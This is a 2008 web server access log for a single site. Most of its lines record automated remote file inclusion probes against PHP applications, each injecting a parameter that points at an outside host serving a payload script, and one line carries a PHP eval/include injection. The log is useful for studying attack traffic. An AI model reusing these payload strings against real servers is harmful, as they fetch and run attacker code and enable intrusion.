81.192.231.166 - - [21/Aug/2008:09:21:15 -0700] "GET /logs/access_080622.log//phpsecurityadmin/include/logout.php?PSA_PATH=ttp://yourtv.co.kr/Mboard/upload/main.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:21:23 -0700] "GET /logs/access_080519.log//include/admin.lib.inc.php?site_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
195.56.111.194 - - [21/Aug/2008:09:21:28 -0700] "GET /logs/access_080401.log/main.php?appserv_root=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.56.111.194 - - [21/Aug/2008:09:21:28 -0700] "GET /main.php?appserv_root=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.56.111.194 - - [21/Aug/2008:09:21:28 -0700] "GET /logs/main.php?appserv_root=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:09:21:49 -0700] "GET /logs/access_080722.log//include/admin.lib.inc.php?site_path=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:09:21:49 -0700] "GET //include/admin.lib.inc.php?site_path=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:09:21:50 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:09:21:50 -0700] "GET /logs/access_080722.log//include/admin.lib.inc.php?site_path=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:09:21:51 -0700] "GET //include/admin.lib.inc.php?site_path=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:09:21:51 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:09:21:56 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:09:21:56 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:09:21:57 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
219.117.239.114 - - [21/Aug/2008:09:22:07 -0700] "GET /logs/access_080330.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
79.189.248.90 - - [21/Aug/2008:09:22:10 -0700] "GET /logs/index.php?inc=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:09:22:10 -0700] "GET //include/admin.lib.inc.php?site_path=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.189.248.90 - - [21/Aug/2008:09:22:17 -0700] "GET /index.php?inc=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 200 9887 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:09:22:20 -0700] "GET /logs/access_080519.log//include/admin.lib.inc.php?site_path=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.211.35.160 - - [21/Aug/2008:09:22:21 -0700] "GET /logs/access_080812.log//layout/default/params.php?gConf[dir][layouts]=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:09:22:27 -0700] "GET /logs/access_080519.log//include/admin.lib.inc.php?site_path=http://katsioulis.com/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.241.162 - - [21/Aug/2008:09:22:52 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
67.19.241.162 - - [21/Aug/2008:09:22:52 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:09:22:56 -0700] "GET /logs/access_080812.log//faqsupport/samplefaqsupport.php?path[docroot]=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
65.55.213.30 - - [21/Aug/2008:09:23:28 -0700] "GET /logs/access_080302.log HTTP/1.0" 200 1917493 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:09:23:46 -0700] "GET /bikes/WeSTOC07/?D=A HTTP/1.0" 200 955 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.10.136.249 - - [21/Aug/2008:09:23:58 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.111.194 - - [21/Aug/2008:09:24:00 -0700] "GET /logs/access_080728.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.56.111.194 - - [21/Aug/2008:09:24:04 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:09:24:45 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.88.192.8 - - [21/Aug/2008:09:24:47 -0700] "GET /logs/access_080213.log/index.php?func=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:24:50 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:24:50 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:24:50 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:24:50 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:09:24:50 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:09:24:59 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.41.76 - - [21/Aug/2008:09:25:11 -0700] "GET /logs/access_080731.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:25:43 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:25:43 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:25:43 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:25:49 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:25:49 -0700] "GET /logs/access_080809.log//modules/vwar/admin/admin.php?vwar_root=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:25:50 -0700] "GET /logs/access_080114.log//modules/vwar/admin/admin.php?vwar_root=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.90.73.113 - - [21/Aug/2008:09:25:51 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=%20http://h1.ripway.com/rombongan/pid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [21/Aug/2008:09:25:51 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=%20http://h1.ripway.com/rombongan/pid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [21/Aug/2008:09:25:52 -0700] "GET //index.php?DOCUMENT_ROOT=%20http://h1.ripway.com/rombongan/pid.txt?? HTTP/1.1" 200 9883 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [21/Aug/2008:09:25:52 -0700] "GET //index.php?DOCUMENT_ROOT=%20http://h1.ripway.com/rombongan/pid.txt?? HTTP/1.1" 200 9883 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [21/Aug/2008:09:25:52 -0700] "GET /logs//index.php?DOCUMENT_ROOT=%20http://h1.ripway.com/rombongan/pid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [21/Aug/2008:09:25:55 -0700] "GET /logs//index.php?DOCUMENT_ROOT=%20http://h1.ripway.com/rombongan/pid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:26:00 -0700] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:26:08 -0700] "GET /logs/access_080226.log//modules/vwar/admin/admin.php?vwar_root=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.90.73.113 - - [21/Aug/2008:09:26:32 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=%20http://h1.ripway.com/rombongan/pid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [21/Aug/2008:09:26:38 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=%20http://h1.ripway.com/rombongan/pid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:09:26:43 -0700] "GET /logs/access_080812.log//faqsupport/samplefaqsupport.php?path[docroot]=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:09:26:44 -0700] "GET /logs/access_070809.log HTTP/1.0" 200 38136 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:26:48 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:26:48 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "dmulk.com"
195.56.111.194 - - [21/Aug/2008:09:26:50 -0700] "GET /logs/access_080809.log/main.php?appserv_root=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:26:52 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:26:52 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "dmulk.com"
83.211.35.160 - - [21/Aug/2008:09:27:41 -0700] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.211.35.160 - - [21/Aug/2008:09:27:42 -0700] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:27:48 -0700] "GET /logs/access_080501.log/avatar.php?page=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:27:48 -0700] "GET /avatar.php?page=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:27:49 -0700] "GET /logs/avatar.php?page=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:27:49 -0700] "GET /logs/access_080406.log/avatar.php?page=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:27:52 -0700] "GET /logs/access_080501.log/avatar.php?page=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:27:52 -0700] "GET /avatar.php?page=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:27:52 -0700] "GET /logs/avatar.php?page=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:27:52 -0700] "GET /logs/access_080406.log/avatar.php?page=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.15.205.17 - - [21/Aug/2008:09:28:03 -0700] "GET /logs/access_080808.log//?pg=http://www.syria4ever.com/prog/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [21/Aug/2008:09:28:04 -0700] "GET //?pg=http://www.syria4ever.com/prog/id1.txt??? HTTP/1.1" 200 9874 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.205.17 - - [21/Aug/2008:09:28:04 -0700] "GET /logs//?pg=http://www.syria4ever.com/prog/id1.txt??? HTTP/1.1" 200 61575 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.111.20 - - [21/Aug/2008:09:28:06 -0700] "GET /logs/access_080808.log//?pg=http://www.insweetlife.com/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
194.97.107.211 - - [21/Aug/2008:09:28:07 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.topyn.com/bajo.txt?? HTTP/1.1" 200 9871 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.111.20 - - [21/Aug/2008:09:28:07 -0700] "GET //?pg=http://www.insweetlife.com/id1.txt??? HTTP/1.1" 200 9868 "-" "libwww-perl/5.813" "www.dmulk.com"
67.205.111.20 - - [21/Aug/2008:09:28:08 -0700] "GET /logs//?pg=http://www.insweetlife.com/id1.txt??? HTTP/1.1" 200 61575 "-" "libwww-perl/5.813" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:28:10 -0700] "GET /logs/access_080126.log//modules/vwar/admin/admin.php?vwar_root=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
217.20.175.69 - - [21/Aug/2008:09:28:38 -0700] "GET /logs/access_080219.log///vwar/backup/errors.php?error=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.175.69 - - [21/Aug/2008:09:28:38 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.149.115.2 - - [21/Aug/2008:09:28:41 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.149.115.2 - - [21/Aug/2008:09:28:41 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:28:41 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
165.166.201.202 - - [21/Aug/2008:09:28:46 -0700] "GET /logs/access_080209.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
165.166.201.202 - - [21/Aug/2008:09:28:46 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.205.17 - - [21/Aug/2008:09:28:47 -0700] "GET /logs/access_080807.log//?pg=http://www.syria4ever.com/prog/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
165.166.201.202 - - [21/Aug/2008:09:28:48 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.111.20 - - [21/Aug/2008:09:28:52 -0700] "GET /logs/access_080807.log//?pg=http://www.insweetlife.com/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
165.166.201.202 - - [21/Aug/2008:09:28:55 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:28:56 -0700] "GET /logs/access_080124.log//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:28:56 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:28:57 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.84.19.133 - - [21/Aug/2008:09:29:00 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../idfast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:29:02 -0700] "GET /logs/access_080124.log//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:29:02 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:29:02 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:29:02 -0700] "GET /logs/access_080124.log//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:29:02 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:29:02 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:29:04 -0700] "GET /logs/access_080124.log//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:29:04 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.67.19.125 - - [21/Aug/2008:09:29:04 -0700] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:29:04 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.67.19.125 - - [21/Aug/2008:09:29:04 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.125 - - [21/Aug/2008:09:29:05 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:29:06 -0700] "GET /logs/access.log/avatar.php?page=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:29:08 -0700] "GET /logs/access.log/avatar.php?page=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:29:22 -0700] "GET /logs/access_080218.log//modules/vwar/admin/admin.php?vwar_root=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:29:50 -0700] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
69.89.27.247 - - [21/Aug/2008:09:29:57 -0700] "GET /logs/access_080509.log//admin/business_inc/saveserver.php?thisdir=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.27.247 - - [21/Aug/2008:09:29:57 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.27.247 - - [21/Aug/2008:09:29:57 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.135.41.76 - - [21/Aug/2008:09:30:03 -0700] "GET /logs/access_080731.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.89.27.247 - - [21/Aug/2008:09:30:10 -0700] "GET /logs/access_080810.log//admin/business_inc/saveserver.php?thisdir=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
